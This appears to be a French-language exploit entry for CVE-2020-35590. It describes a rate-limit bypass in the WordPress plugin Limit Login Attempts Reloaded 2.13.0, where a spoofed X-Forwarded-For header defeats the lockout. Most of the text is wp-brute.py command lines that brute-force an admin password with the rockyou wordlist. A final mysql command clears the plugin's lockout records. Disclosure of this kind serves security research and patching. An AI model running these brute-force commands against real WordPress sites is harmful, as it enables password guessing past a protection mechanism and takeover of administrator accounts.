
Outil de force brute pour le plugin WordPress Limit Login Attempts Reloaded >=2.13.0 - Contournement de la limite de connexion (CVE-2020-35590)
Titre de l'exploit : WordPress Plugin Limit Login Attempts Reloaded 2.13.0 - Contournement de la limite de connexion
CVE : CVE-2020-35590
Date : 2020-06-09
Auteur de l'exploit : N4nj0
Lien du logiciel : https://wordpress.org/plugins/limit-login-attempts-reloaded/
Version : 2.13.0
Testé sur : WordPress 5.4.1, 5.4.2
Avis de vulnérabilité : https://n4nj0.github.io/advisories/wordpress-plugin-limit-login-attempts-reloaded/
Le plugin WordPress concerné est conçu comme mécanisme de protection contre les attaques par force brute, et est actuellement installé sur plus d'un million d'installations actives.
J'ai découvert un contournement de la limitation de débit dans une configuration non par défaut, ce qui rend l'objectif du plugin inefficace.
./wp-brute.py -c -u http://wordpress -H X-Forwarded-For -l admin -P /usr/share/wordlists/rockyou.txt
./wp-brute.py --check --url http://wordpress --header X-Forwarded-For --login admin --passwordlist /usr/share/wordlists/rockyou.txt --quiet
./wp-brute.py -e -u http://wordpress -H X-Forwarded-For -l admin -P /usr/share/wordlists/rockyou.txt -q
./wp-brute.py --exploit --url http://wordpress --header X-Forwarded-For --login admin --passwordlist /usr/share/wordlists/rockyou.txt --quiet
mysql -uroot -ppassword wordpress -e "UPDATE wp_options SET option_value = '' WHERE option_name = 'limit_login_lockouts' LIMIT 1;"